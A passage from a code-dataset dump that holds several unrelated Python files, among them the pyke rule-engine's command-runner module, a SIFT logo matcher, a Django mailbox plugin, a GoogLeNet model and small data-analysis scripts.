¿no?\")\n op = input(\"\")\n if (op == \"si\"):\n eliminar()\n if (op == \"no\"):\n break\n\n\n if opcion == \"0\":\n break\n","repo_name":"AlexRodriguezVillavicencio/Backend","sub_path":"tarea/semana 1/4.RegCursos.py","file_name":"4.RegCursos.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5322900752","text":"import subprocess\nimport contextlib\nfrom pyke import knowledge_base, rule_base\n\n# claim_goal, fact, prove_all, gather_all\n\nclass special_knowledge_base(knowledge_base.knowledge_base):\n def __init__(self, engine):\n super(special_knowledge_base, self).__init__(engine, 'special')\n\n def add_fn(self, fn):\n if fn.name in self.entity_lists:\n raise KeyError(\"%s.%s already exists\" % (self.name, fn.name))\n self.entity_lists[fn.name] = fn\n\n def print_stats(self, f):\n pass\n\nclass special_fn(knowledge_base.knowledge_entity_list):\n def __init__(self, special_base, name):\n super(special_fn, self).__init__(name)\n special_base.add_fn(self)\n\n def lookup(self, bindings, pat_context, patterns):\n raise AssertionError(\"special.%s may not be used in forward chaining \"\n \"rules\" % self.name)\n\n def prove(self, bindings, pat_context, patterns):\n raise AssertionError(\"special.%s may not be used in backward chaining \"\n \"rules\" % self.name)\n\nclass special_both(special_fn):\n def prove(self, bindings, pat_context, patterns):\n return self.lookup(bindings, pat_context, patterns)\n\nclass claim_goal(special_fn):\n r'''\n >>> class stub(object):\n ... def add_fn(self, fn): pass\n >>> cg = claim_goal(stub())\n >>> mgr = cg.prove(None, None, None)\n >>> gen = iter(mgr.__enter__())\n >>> next(gen)\n >>> next(gen)\n Traceback (most recent call last):\n ...\n pyke.rule_base.StopProof\n >>> mgr.__exit__(None, None, None)\n >>> cg.lookup(None, None, None)\n Traceback (most recent call last):\n ...\n AssertionError: special.claim_goal may not be used in forward chaining rules\n '''\n def __init__(self, special_base):\n super(claim_goal, self).__init__(special_base, 'claim_goal')\n\n def prove(self, bindings, pat_context, patterns):\n def gen():\n yield\n raise rule_base.StopProof\n\n return contextlib.closing(gen())\n\ndef run_cmd(pat_context, cmd_pat, cwd_pat=None, stdin_pat=None):\n r'''\n >>> from pyke import pattern\n >>> run_cmd(None, pattern.pattern_literal(('true',)))\n (0, '', '')\n >>> run_cmd(None, pattern.pattern_literal(('false',)))\n (1, '', '')\n >>> ret, out, err = run_cmd(None, pattern.pattern_literal(('pwd',)))\n >>> ret\n 0\n >>> err\n ''\n >>> import os\n >>> cwd = os.getcwd() + '\\n'\n >>> out == cwd\n True\n >>> run_cmd(None, pattern.pattern_literal(('pwd',)),\n ... pattern.pattern_literal('/home/bruce'))\n (0, '/home/bruce\\n', '')\n '''\n stdin = None\n if stdin_pat is not None:\n data = stdin_pat.as_data(pat_context)\n if data is not None:\n stdin = data.encode()\n process = subprocess.Popen(cmd_pat.as_data(pat_context),\n bufsize=-1,\n universal_newlines=True,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n cwd= None if cwd_pat is None\n else cwd_pat.as_data(pat_context))\n out, err = process.communicate(stdin)\n return process.returncode, out, err\n\nclass check_command(special_both):\n r'''\n >>> from pyke import pattern, contexts\n >>> class stub(object):\n ... def add_fn(self, fn): pass\n >>> cc = check_command(stub())\n >>> ctxt = contexts.simple_context()\n >>> mgr = cc.lookup(ctxt, ctxt, (pattern.pattern_literal(('true',)),))\n >>> gen = iter(mgr.__enter__())\n >>> next(gen)\n >>> ctxt.dump()\n >>> next(gen)\n Traceback (most recent call last):\n ...\n StopIteration\n >>> ctxt.dump()\n >>> mgr.__exit__(None, None, None)\n >>> mgr = cc.lookup(ctxt, ctxt, (pattern.pattern_literal(('false',)),))\n >>> gen = iter(mgr.__enter__())\n >>> next(gen)\n Traceback (most recent call last):\n ...\n StopIteration\n >>> ctxt.dump()\n >>> mgr.__exit__(None, None, None)\n >>> mgr = cc.prove(ctxt, ctxt, (pattern.pattern_literal(('true',)),))\n >>> gen = iter(mgr.__enter__())\n >>> next(gen)\n >>> ctxt.dump()\n >>> next(gen)\n Traceback (most recent call last):\n ...\n StopIteration\n >>> ctxt.dump()\n >>> mgr.__exit__(None, None, None)\n '''\n def __init__(self, special_base):\n super(check_command, self).__init__(special_base, 'check_command')\n\n def lookup(self, bindings, pat_context, patterns):\n if len(patterns) < 1: return knowledge_base.Gen_empty\n retcode, out, err = run_cmd(pat_context, patterns[0],\n patterns[1] if len(patterns) > 1\n else None,\n patterns[2] if len(patterns) > 2\n else None)\n if retcode: return knowledge_base.Gen_empty\n return knowledge_base.Gen_once\n\nclass command(special_both):\n r'''\n >>> from pyke import pattern, contexts\n >>> class stub(object):\n ... def add_fn(self, fn): pass\n >>> c = command(stub())\n >>> ctxt = contexts.simple_context()\n >>> mgr = c.lookup(ctxt, ctxt,\n ... (contexts.variable('ans'),\n ... pattern.pattern_literal(('echo', 'hi'))))\n >>> gen = iter(mgr.__enter__())\n >>> next(gen)\n >>> ctxt.dump()\n ans: ('hi',)\n >>> next(gen)\n Traceback (most recent call last):\n ...\n StopIteration\n >>> ctxt.dump()\n >>> mgr.__exit__(None, None, None)\n >>> mgr = c.lookup(ctxt, ctxt,\n ... (contexts.variable('ans'),\n ... pattern.pattern_literal(('cat',)),\n ... pattern.pattern_literal(None),\n ... pattern.pattern_literal('line1\\nline2\\nline3\\n')))\n >>> gen = iter(mgr.__enter__())\n >>> next(gen)\n >>> ctxt.dump()\n ans: ('line1', 'line2', 'line3')\n >>> next(gen)\n Traceback (most recent call last):\n ...\n StopIteration\n >>> ctxt.dump()\n >>> mgr.__exit__(None, None, None)\n '''\n def __init__(self, special_base):\n super(command, self).__init__(special_base, 'command')\n\n def lookup(self, bindings, pat_context, patterns):\n if len(patterns) < 2: return knowledge_base.Gen_empty\n retcode, out, err = run_cmd(pat_context, patterns[1],\n patterns[2] if len(patterns) > 2\n else None,\n patterns[3] if len(patterns) > 3\n else None)\n if retcode != 0:\n raise subprocess.CalledProcessError(\n retcode,\n ' '.join(patterns[1].as_data(pat_context)))\n def gen():\n mark = bindings.mark(True)\n try:\n outlines = tuple(out.rstrip('\\n').split('\\n'))\n if patterns[0].match_data(bindings, pat_context, outlines):\n bindings.end_save_all_undo()\n yield\n else:\n bindings.end_save_all_undo()\n finally:\n bindings.undo_to_mark(mark)\n\n return contextlib.closing(gen())\n\nclass general_command(special_both):\n r'''\n >>> from pyke import pattern, contexts\n >>> class stub(object):\n ... def add_fn(self, fn): pass\n >>> gc = general_command(stub())\n >>> ctxt = contexts.simple_context()\n >>> ctxt.dump()\n >>> mgr = gc.lookup(ctxt, ctxt,\n ... (contexts.variable('ans'),\n ... pattern.pattern_literal(('echo', 'hi'))))\n >>> gen = iter(mgr.__enter__())\n >>> next(gen)\n >>> ctxt.dump()\n ans: (0, 'hi\\n', '')\n >>> next(gen)\n Traceback (most recent call last):\n ...\n StopIteration\n >>> ctxt.dump()\n >>> mgr.__exit__(None, None, None)\n '''\n def __init__(self, special_base):\n super(general_command, self).__init__(special_base, 'general_command')\n\n def lookup(self, bindings, pat_context, patterns):\n if len(patterns) < 2: return knowledge_base.Gen_empty\n ans = run_cmd(pat_context, patterns[1],\n patterns[2] if len(patterns) > 2 else None,\n patterns[3] if len(patterns) > 3 else None)\n\n def gen():\n mark = bindings.mark(True)\n try:\n if patterns[0].match_data(bindings, pat_context, ans):\n bindings.end_save_all_undo()\n yield\n else:\n bindings.end_save_all_undo()\n finally:\n bindings.undo_to_mark(mark)\n\n return contextlib.closing(gen())\n\ndef create_for(engine):\n special_base = special_knowledge_base(engine)\n claim_goal(special_base)\n check_command(special_base)\n command(special_base)\n general_command(special_base)\n\n\n","repo_name":"nvitucci/pyke","sub_path":"pyke/special.py","file_name":"special.py","file_ext":"py","file_size_in_byte":9542,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"30258896681","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 5 02:30:06 2018\n\n@author: Abhishek Bansal\n\"\"\"\n\nimport cv2\nimport numpy as np\nfrom src import constants\n\n\nclass SIFT:\n def __init__(self):\n self.SIFTFeaturesTrain = None\n self.trainLabels = None\n self.sift = cv2.xfeatures2d.SIFT_create()\n self.FLANN_INDEX_KDTREE = 1\n self.index_params = dict(algorithm=self.FLANN_INDEX_KDTREE, trees=5)\n self.search_params = dict() # or pass empty dictionary\n self.flann = cv2.FlannBasedMatcher(self.index_params, self.search_params)\n self.predictions = None\n self.probability = None\n self.numOfLogosPerClass = None\n\n def extractSIFTFeatures(self, image):\n keypoints, descriptors = self.sift.detectAndCompute(image, None)\n return keypoints, descriptors\n\n def countMatchingSIFTFeatures(self, features1, features2):\n matches = self.flann.knnMatch(features1, features2, k=2)\n # ratio test as per Lowe's paper\n count = 0\n for m, n in matches:\n if m.distance < constants.ratioTestLowe * n.distance:\n count += 1\n return count\n\n def predictSIFTFeatures(self, descriptorTest):\n numTrainingExamples = len(self.SIFTFeaturesTrain)\n numLabels = len(self.numOfLogosPerClass)\n count = np.zeros((numLabels,))\n for i in range(numTrainingExamples):\n count[self.trainLabels[i] - 1] += self.countMatchingSIFTFeatures(self.SIFTFeaturesTrain[i], descriptorTest)\n count /= self.numOfLogosPerClass\n return np.argmax(count) + 1, np.amax(count)\n\n def matchFeatures(self, images, saveModel=True):\n self.SIFTFeaturesTrain = []\n self.trainLabels = images.trainLabels\n self.numOfLogosPerClass = images.numOfLogosPerClass\n print(\"Extracting SIFT Features\")\n for image in images.trainImages:\n keypoints, descriptors = self.extractSIFTFeatures(image)\n self.SIFTFeaturesTrain.append(descriptors)\n print(\"Done!\")\n if saveModel:\n np.save(constants.SIFTModelLoc, self.SIFTFeaturesTrain)\n np.save(constants.SIFTLabelLoc, self.trainLabels)\n np.save(constants.SIFTNumOfLogosPerClass, self.numOfLogosPerClass)\n\n self.predictions = []\n self.probability = []\n\n print(\"Predicting Test Images - SIFT\")\n for index, image in enumerate(images.testImages):\n keypoints, descriptorTest = self.extractSIFTFeatures(image)\n x, y = self.predictSIFTFeatures(descriptorTest)\n self.predictions.append(x)\n self.probability.append(y)\n print(\"Done!\")\n\n return self.predictions, self.probability\n\n def loadSIFTModel(self):\n self.SIFTFeaturesTrain = np.load(constants.SIFTModelLoc)\n self.trainLabels = np.load(constants.SIFTLabelLoc)\n self.numOfLogosPerClass = np.load(constants.SIFTNumOfLogosPerClass)\n","repo_name":"rektabhi/DocumentLogoIdentification","sub_path":"src/SIFT.py","file_name":"SIFT.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73722676967","text":"from django.db import models\n\ntry:\n import django_mailbox\nexcept ImportError:\n django_mailbox = None\n\nfrom lino.api import dd, rt, _\n\n\ndef preview(obj, ar):\n return obj.html or obj.text\n\ndef spam(obj):\n \"\"\"Checks if the message is spam or not\n \"\"\"\n if obj.subject.startswith(\"*****SPAM*****\"):\n return True\n else:\n return False\n\nif django_mailbox is not None:\n # When django_mailbox is not installed, this plugin does nothing, but it\n # must be importable for :manage:`install`.\n\n dd.inject_field('django_mailbox.Message', 'preview',\n dd.VirtualField(dd.HtmlBox(_(\"Preview\")), preview))\n dd.inject_field('django_mailbox.Message', 'ticket',\n dd.ForeignKey('tickets.Ticket', blank=True, null=True))\n # dd.inject_field('django_mailbox.Message', 'spam',\n # models.BooleanField(_(\"Spam\"), default=False))\n #\n dd.update_field('django_mailbox.Message', 'from_header', format=\"plain\")\n\n @dd.schedule_often(10)\n def get_new_mail():\n for mb in rt.models.django_mailbox.Mailbox.objects.filter(active=True):\n # print(\"20210305\", mb)\n mails = mb.get_new_mail()\n for mail in mails:\n if spam(mail):\n mail.spam = True\n mail.full_clean()\n mail.save()\n if mails:\n dd.logger.info(\"got {} from mailbox: {}\".format(mails, mb))\n\n\n class DeleteSpam(dd.Action):\n\n show_in_bbar = True\n readonly = False\n # required_roles = dd.login_required(Worker)\n label = \"X\"\n\n def run_from_ui(self, ar, **kw):\n spams = rt.models.django_mailbox.Message.objects.filter(spam=True)\n dd.logger.info(\"Deleting spam messages [%s]\", spams)\n\n def ok(ar):\n for obj in spams:\n obj.delete()\n ar.set_response(refresh=True)\n\n ar.confirm(\n ok,\n _(\"Delete {} messages.\").format(spams.count()),\n _(\"Are you sure?\"))\n\n dd.inject_action(\"django_mailbox.Message\", delete_spam=DeleteSpam())\n\n from .ui import *\n","repo_name":"lino-framework/xl","sub_path":"lino_xl/lib/mailbox/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71360945769","text":"# limitation: expects movie_id to be sorted in ratings_matrix file and predictions_matrix to be sorted by both movie_id and user_id\n\nimport numpy as np\nimport sys\nimport math\n\nif len(sys.argv) != 3:\n print(\"need 2 arguments\")\n sys.exit()\n\nusers = set()\nmovies = set()\n\ncurrent_movie_id = -1\nwith open(sys.argv[1], 'r') as ratings_matrix:\n for line in ratings_matrix:\n line = line.strip()\n if line.endswith(':'):\n current_movie_id = int(line.split(':')[0])\n continue\n movies.add(current_movie_id)\n user_id, _, _ = line.split(\",\")\n users.add(int(user_id))\n\nprint(\"#users in ratings_matrix: \", len(users))\nprint(\"#movies in ratings_matrix: \", len(movies))\n\nratings_np_matrix = np.empty([len(users), len(movies)])\n\nmap_user_id_to_idx = dict()\nsorted_users = sorted(list(users))\n\nfor idx, user in enumerate(sorted_users):\n map_user_id_to_idx[user] = idx\n\n# read original ratings\n\ncol_idx = -1\nprevious_movie_id = -2\ncurrent_movie_id = -1\nwith open(sys.argv[1], 'r') as ratings_matrix:\n for line in ratings_matrix:\n line = line.strip()\n if line.endswith(':'):\n current_movie_id = int(line.split(':')[0])\n continue\n user_id, rating, _ = line.split(\",\")\n user_id = int(user_id)\n rating = float(rating)\n if current_movie_id != previous_movie_id:\n previous_movie_id = current_movie_id\n # already sorted by movie_id so we can just increase index and don't need something like map_user_id_to_idx\n col_idx += 1\n try:\n ratings_np_matrix[map_user_id_to_idx[user_id]][col_idx] = rating\n except Exception as e:\n import pdb;pdb.set_trace()\n\n\n# read predictions\npredictions_np_matrix = np.empty([len(users), len(movies)])\n\nwith open(sys.argv[2], 'r') as predictions_matrix:\n idx = 0\n for line in predictions_matrix:\n if \"real\" in line:\n # skip header line\n continue\n line = line.strip()\n for idx_2, cell in enumerate(line.split(\" \")):\n try:\n predictions_np_matrix[idx][idx_2] = float(cell)\n except Exception as e:\n import pdb;pdb.set_trace()\n idx += 1\n\n\n# compute MSE\nse = 0.0\ncount = 0\n\nfor i in range(len(users)):\n for j in range(len(movies)):\n if ratings_np_matrix[i][j] != 0:\n se += ((ratings_np_matrix[i][j] - predictions_np_matrix[i][j]) ** 2)\n count += 1\n\nmse = se / float(count)\nprint(\"MSE:\", mse)\nprint(\"RMSE:\", math.sqrt(mse))\n","repo_name":"jakob-ed/Collaborative-Filtering-Kafka","sub_path":"scripts/calculate_mse.py","file_name":"calculate_mse.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"6389558278","text":"import math\nimport numpy as np\nimport h5py\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom tensorflow.python.framework import ops\n\ndef load_dataset():\n train_dataset = h5py.File('../../datasets/train_signs.h5', \"r\")\n train_set_x_orig = np.array(train_dataset[\"train_set_x\"][:]) # your train set features\n train_set_y_orig = np.array(train_dataset[\"train_set_y\"][:]) # your train set labels\n # print(\"1:train_set_x_orig,shape\"+str(train_set_x_orig.shape))\n # print(\"1:train_set_y_orig,shape\"+str(train_set_y_orig.shape))\n\n test_dataset = h5py.File('../../datasets/test_signs.h5', \"r\")\n test_set_x_orig = np.array(test_dataset[\"test_set_x\"][:]) # your test set features\n test_set_y_orig = np.array(test_dataset[\"test_set_y\"][:]) # your test set labels\n # print(\"2:test_set_x_orig,shape\"+str(test_set_x_orig.shape))\n # print(\"2:test_set_y_orig,shape\"+str(test_set_y_orig.shape))\n\n classes = np.array(test_dataset[\"list_classes\"][:]) # the list of classes\n\n return train_set_x_orig, train_set_y_orig, test_set_x_orig, test_set_y_orig, classes\n\n# def load_dataset():\n# train_dataset = h5py.File('datasets/flowers/227/flowers_random.h5', \"r\")\n# train_set_x_orig = np.array(train_dataset[\"flowers\"][:]) # your train set features\n# train_set_y_orig = np.array(train_dataset[\"label\"][:]) # your train set labels\n\n# test_dataset = h5py.File('datasets/flowers/227/test_flowers_random.h5', \"r\")\n# test_set_x_orig = np.array(test_dataset[\"flowers\"][:]) # your test set features\n# test_set_y_orig = np.array(test_dataset[\"label\"][:]) # your test set labels\n\n# classes = np.array(test_dataset[\"list_classes\"][:]) # the list of classes\n \n# train_set_y_orig = train_set_y_orig.reshape((1, train_set_y_orig.shape[0]))\n# test_set_y_orig = test_set_y_orig.reshape((1, test_set_y_orig.shape[0]))\n \n# return train_set_x_orig, train_set_y_orig, test_set_x_orig, test_set_y_orig, classes\n\ndef random_mini_batches(X, Y, mini_batch_size = 64, seed = 0):\n m = X.shape[0] # number of training examples\n mini_batches = []\n np.random.seed(seed)\n \n # Step 1: Shuffle (X, Y)\n permutation = list(np.random.permutation(m))\n shuffled_X = X[permutation,:,:,:]\n shuffled_Y = Y[permutation,:]\n\n # Step 2: Partition (shuffled_X, shuffled_Y). Minus the end case.\n num_complete_minibatches = math.floor(m/mini_batch_size) # number of mini batches of size mini_batch_size in your partitionning\n for k in range(0, num_complete_minibatches):\n mini_batch_X = shuffled_X[k * mini_batch_size : k * mini_batch_size + mini_batch_size,:,:,:]\n mini_batch_Y = shuffled_Y[k * mini_batch_size : k * mini_batch_size + mini_batch_size,:]\n mini_batch = (mini_batch_X, mini_batch_Y)\n mini_batches.append(mini_batch)\n \n # Handling the end case (last mini-batch < mini_batch_size)\n if m % mini_batch_size != 0:\n mini_batch_X = shuffled_X[num_complete_minibatches * mini_batch_size : m,:,:,:]\n mini_batch_Y = shuffled_Y[num_complete_minibatches * mini_batch_size : m,:]\n mini_batch = (mini_batch_X, mini_batch_Y)\n mini_batches.append(mini_batch)\n \n return mini_batches\n\ndef convert_to_one_hot(Y, C):\n Y = np.eye(C)[Y.reshape(-1)].T\n return Y\n\n#创建占位符\ndef create_placeholder(n_H0, n_W0, n_C0, n_y):\n X = tf.placeholder(tf.float32, [None, n_H0, n_W0, n_C0], name = \"X\")\n Y = tf.placeholder(tf.float32, [None,n_y], name = \"Y\")\n keep_prob = tf.placeholder(tf.float32)\n return X,Y,keep_prob\n\ndef inception_module_v1(X):\n Z11 = tf.contrib.layers.conv2d(inputs=X, num_outputs=64, kernel_size=[1,1], stride=[1,1], padding='SAME', activation_fn=tf.nn.relu) \n\n Z21 = tf.contrib.layers.conv2d(inputs=X, num_outputs=64, kernel_size=[1,1], stride=[1,1], padding='SAME', activation_fn=tf.nn.relu) \n Z22 = tf.contrib.layers.conv2d(inputs=Z21, num_outputs=128, kernel_size=[3,3], stride=[1,1], padding='SAME', activation_fn=tf.nn.relu) \n\n Z31 = tf.contrib.layers.conv2d(inputs=X, num_outputs=32, kernel_size=[1,1], stride=[1,1], padding='SAME', activation_fn=tf.nn.relu) \n Z32 = tf.contrib.layers.conv2d(inputs=Z31, num_outputs=32, kernel_size=[5,5], stride=[1,1], padding='SAME', activation_fn=tf.nn.relu) \n\n Z41 = tf.contrib.layers.max_pool2d(inputs=X, kernel_size=[3,3], stride=[1,1], padding='SAME') \n Z42 = tf.contrib.layers.conv2d(inputs=Z41, num_outputs=32, kernel_size=[1,1], stride=[1,1], padding='SAME', activation_fn=tf.nn.relu) \n\n ZX = tf.concat([Z11,Z22,Z32,Z42],3)\n return ZX\n\n#前向传播\ndef forward_propagation(X,keep_prob):\n print(\"X.shape\"+str(X.shape))\n Z1 = tf.contrib.layers.conv2d(inputs=X, num_outputs=64, kernel_size=[7,7], stride=[2,2], padding='SAME', activation_fn=tf.nn.relu) #kernel_size=[7,7]\n Z1 = tf.contrib.layers.max_pool2d(inputs=Z1, kernel_size=[3,3], stride=[2,2], padding='SAME') \n\n Z2 = tf.contrib.layers.conv2d(inputs=Z1, num_outputs=64, kernel_size=[1,1], stride=[1,1], padding='SAME', activation_fn=tf.nn.relu) \n Z2 = tf.contrib.layers.conv2d(inputs=Z2, num_outputs=192, kernel_size=[3,3], stride=[1,1], padding='SAME', activation_fn=tf.nn.relu) \n Z2 = tf.contrib.layers.max_pool2d(inputs=Z2, kernel_size=[3,3], stride=[2,2], padding='SAME') \n\n I1 = inception_module_v1(Z2)#inception (3a)\n I2 = inception_module_v1(I1)#inception (3b)\n # I2 = tf.contrib.layers.max_pool2d(inputs=I2, kernel_size=[3,3], stride=[2,2], padding='SAME')\n I3 = inception_module_v1(I2)#inception (4a)\n A1 = tf.contrib.layers.avg_pool2d(inputs=I3, kernel_size=[5,5], stride=[3,3], padding='VALID')\n Z9 = tf.contrib.layers.conv2d(inputs=A1, num_outputs=16, kernel_size=[1,1], stride=[1,1], padding=\"SAME\", activation_fn=tf.nn.relu)\n Z9 = tf.contrib.layers.flatten(Z9)\n Z9 = tf.contrib.layers.fully_connected(Z9,64,activation_fn=tf.nn.relu)\n Z9 = tf.contrib.layers.fully_connected(Z9,6,activation_fn=None)\n\n I4 = inception_module_v1(I3)#inception (4b)\n I5 = inception_module_v1(I4)#inception (4c)\n I6 = inception_module_v1(I5)#inception (4d)\n A2 = tf.contrib.layers.avg_pool2d(inputs=I6, kernel_size=[5,5], stride=[3,3], padding='VALID')\n Z15 = tf.contrib.layers.conv2d(inputs=A2, num_outputs=16, kernel_size=[1,1], stride=[1,1], padding=\"SAME\", activation_fn=tf.nn.relu)\n Z15 = tf.contrib.layers.flatten(Z15)\n Z15 = tf.contrib.layers.fully_connected(Z15,64,activation_fn=tf.nn.relu)\n Z15 = tf.contrib.layers.fully_connected(Z15,6,activation_fn=None)\n\n I7 = inception_module_v1(I6)#inception (4e)\n # I7 = tf.contrib.layers.max_pool2d(inputs=I7, kernel_size=[3,3], stride=[2,2], padding='SAME')\n I8 = inception_module_v1(I7)#inception (5a)\n I9 = inception_module_v1(I8)#inception (5b)\n A3 = tf.contrib.layers.avg_pool2d(inputs=I9, kernel_size=[7,7], stride=[1,1], padding='VALID')\n Z22 = tf.contrib.layers.flatten(A3)\n Z22 = tf.contrib.layers.fully_connected(Z22,6,activation_fn=None)#tf.nn.softmax)\n print(\"Z22.shape\"+str(Z22.shape))\n Z22 = 0.3*Z9 + 0.3*Z15 + 0.4*Z22\n return Z22\n\n#计算loss\ndef compute_loss(Z6,Y):\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits = Z6, labels = Y))\n return loss ","repo_name":"DoubleYuanL/GoogLeNet_v1","sub_path":"inception_v1_utils.py","file_name":"inception_v1_utils.py","file_ext":"py","file_size_in_byte":7240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30421041805","text":"# Online Python compiler (interpreter) to run Python online.\n# Write Python 3 code in this online editor and run it.\nimport hashlib\nimport random\nimport time\n\nStamp=time.time()\nprint(Stamp)\nblock=[]\n# initializing string\nstr = \"1\"\nblock.append(Stamp)\nblock.append(int(str))\nprint(sum(block))\ngiving_input=\"{}\".format(sum(block))\n\n# encoding GeeksforGeeks using encode()\n# then sending to SHA256()\nresult = hashlib.sha256(giving_input.encode())\n \n# printing the equivalent hexadecimal value.\nprint(\"The hexadecimal equivalent of SHA256 is : \")\nprint(result.hexdigest())\nrandom.seed(result.hexdigest())\nprint(random.random())\n","repo_name":"Sam2636/rnd_cross_chain","sub_path":"hashing_exp.py","file_name":"hashing_exp.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37945095593","text":"#!/usr/local/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\n@Author: Minh.nguyen\n@Created Date: Sunday August 2, 2015\n\"\"\"\ndef get_test_data_by_sheet_name(path_to_data_file, sheet_name):\n \"\"\"Get all data from spread sheet file (only *.xlsx)\n\n Required: first row will be taken as test cases id (unique attribue) \n and make it as the primary key to find test data for that test case\n \n Ex: \n 1. Spread sheet format:\n | Test case id (optional title) | header1 (mandatory title) | header2 (mandatory title) |\n | tc_001 | data01_test01 | data02_test02 |\n | tc_002 | data01_test02 | data02_test02 |\n\n 2. Return value\n {\n 'tc_001' : {'header1' : 'data01_test01', 'header2' : 'data01_test02'},\n 'tc_002' : {'header2' : 'data01_test02', 'header2' : 'data02_test02'}\n }\n\n \"\"\"\n \n from openpyxl import load_workbook\n from openpyxl import Workbook\n \n wb = None\n ws = None\n \n try:\n wb = load_workbook(path_to_data_file)\n ws = wb.get_sheet_by_name(sheet_name)\n except:\n assert False, \"Could not find excel file located in path: '%s'\" % (path_to_data_file)\n\n if ws is None:\n assert False, \"Sheet name '%s' does not exist in excel file \" % (sheet_name)\n\n # get highest row and column\n row_count = ws.max_row + 1\n column_count = ws.max_column + 1\n \n test_data = {}\n\n for row_index in range(2, row_count):\n current_row_data = {}\n\n for column_index in range(2, column_count):\n \n # get header and make it as a key to find data\n header = ws.cell(row = 1, column = column_index).value\n # if header is none, skip this row\n if header is None:\n continue\n else:\n header = str(header).lower()\n \n # get data at column index\n data = ws.cell(row = row_index, column = column_index).value or \"\"\n\n \n current_row_data.update({header:data})\n # get test case id and mark it as the primary key to find a row data\n test_id = ws.cell(row = row_index, column = 1).value\n # add row data to test data\n test_data.update({test_id:current_row_data})\n\n return test_data\n","repo_name":"minhnguyenphuonghoang/service_cube_automation_testing","sub_path":"Libraries/data_interaction.py","file_name":"data_interaction.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72234710248","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndf1=pd.read_csv(\n 'MSFT.csv',\n parse_dates=['Date'], # merubah data string pada kolom tanggal menjadi data timestamp\n index_col='Date'\n )\nprint(df1)\nprint(df1['Close'].resample('M').mean()) # menampilkan rata-rata dari sampling bulanan data close \nprint(df1['Close'].resample('W').mean()) # menampilkan rata-rata dari sampling mingguan data close\nprint(df1['Close'].resample('Q').mean()) # menampilkan rata-rata dari sampling kuartil tahun data close\nprint(df1['Close'].resample('Y').mean()) # menampilkan rata-rata dari sampling tahunan data close\n\ndf2=pd.read_csv(\n 'AAPL.csv',\n parse_dates=['Date'] # merubah data string pada kolom tanggal menjadi data timestamp\n )\nprint(df2)\n\nplt.plot(\n df1.index,df1['Adj Close'],'r-',\n df2['Date'],df2['Adj Close'],'g-'\n)\nplt.xlabel('Tanggal')\nplt.ylabel('$')\nplt.xticks(rotation=65)\nplt.grid(True)\nplt.legend(['Microsoft','Apple'])\nplt.show()","repo_name":"agammsantos/Data-Science-Class-Purwadhika","sub_path":"pertemuan28/pertemuan28microsoft.py","file_name":"pertemuan28microsoft.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72639795048","text":"\"\"\"Task related definitions\"\"\"\n\nclass TaskStatus:\n \"\"\"Enum for task status\"\"\"\n Waiting = 'Waiting'\n Running = 'Running'\n Success = 'Success'\n Failure = 'Failure'\n\n\nclass Task:\n \"\"\"A task consists of function, its parameters and a name associated with it\"\"\"\n\n def __init__(self, name, func, args=(), kwargs=None):\n self.name = name\n self.func = func\n self.args = args\n self.kwargs = kwargs or {}\n\n def run(self):\n self.func(*self.args, **self.kwargs)\n\n def __hash__(self):\n return hash(self.name)\n\n def __eq__(self, other):\n return isinstance(other, Task) and self.name == other.name\n\n def __repr__(self):\n return 'gtui.Task(name={}, func={!r}, args={!r}, kwargs={!r})'.format(\n self.name,\n self.func,\n self.args,\n self.kwargs\n )\n\nclass TaskGraph:\n \"\"\"A graph containing tasks and their execution dependencies\"\"\"\n\n def __init__(self):\n self.tasks = []\n self.task2waiting_for = {}\n\n def add_task(self, task, waiting_for=None):\n \"\"\"Add task to this graph\n\n Parameters\n ----------\n task : Task\n a task instance\n waiting_for : Task or list\n a task or a list of tasks to wait for\n \"\"\"\n if task not in self.tasks:\n self.tasks.append(task)\n self.task2waiting_for[task] = []\n\n if waiting_for:\n self.add_dependency(task, waiting_for)\n\n def add_tasks(self, tasks):\n \"\"\"Add a list of task to this graph\"\"\"\n for t in tasks:\n self.add_task(t)\n\n def add_dependency(self, task, waiting_for):\n \"\"\"Add execution dependency to this graph\n\n Parameters\n ----------\n task : Task\n a task instance\n waiting_for : Task or list\n a task or a list of tasks to wait for\n \"\"\"\n if isinstance(waiting_for, Task):\n self.task2waiting_for[task].append(waiting_for)\n\n if isinstance(waiting_for, list):\n self.task2waiting_for[task] += waiting_for\n\n def run(self,\n title='Demo',\n callback=None,\n log_formatter=None,\n exit_on_success=False\n ):\n \"\"\"A hepler function to run this task graph\n\n Parameters\n ----------\n title : str\n The title of TUI, will be displayed at left bottom corner.\n callback : functoin\n A function which accepts a boolean indicating whether execution succeeds.\n It will be called when execution finishes.\n log_formatter: logging.Formatter\n An instance of logging.Formatter. Defaults to gtui.utils.default_log_formatter.\n exit_on_success: boolean\n Whether exit TUI if all tasks succeed. Defaults to False.\n\n Raises\n ------\n ValueError\n If there is a cycle in graph, the message describe the cycle with task names.\n \"\"\"\n from .visualizer import Visualizer\n from .utils import default_log_formatter\n\n if not log_formatter:\n log_formatter = default_log_formatter\n\n cycle = 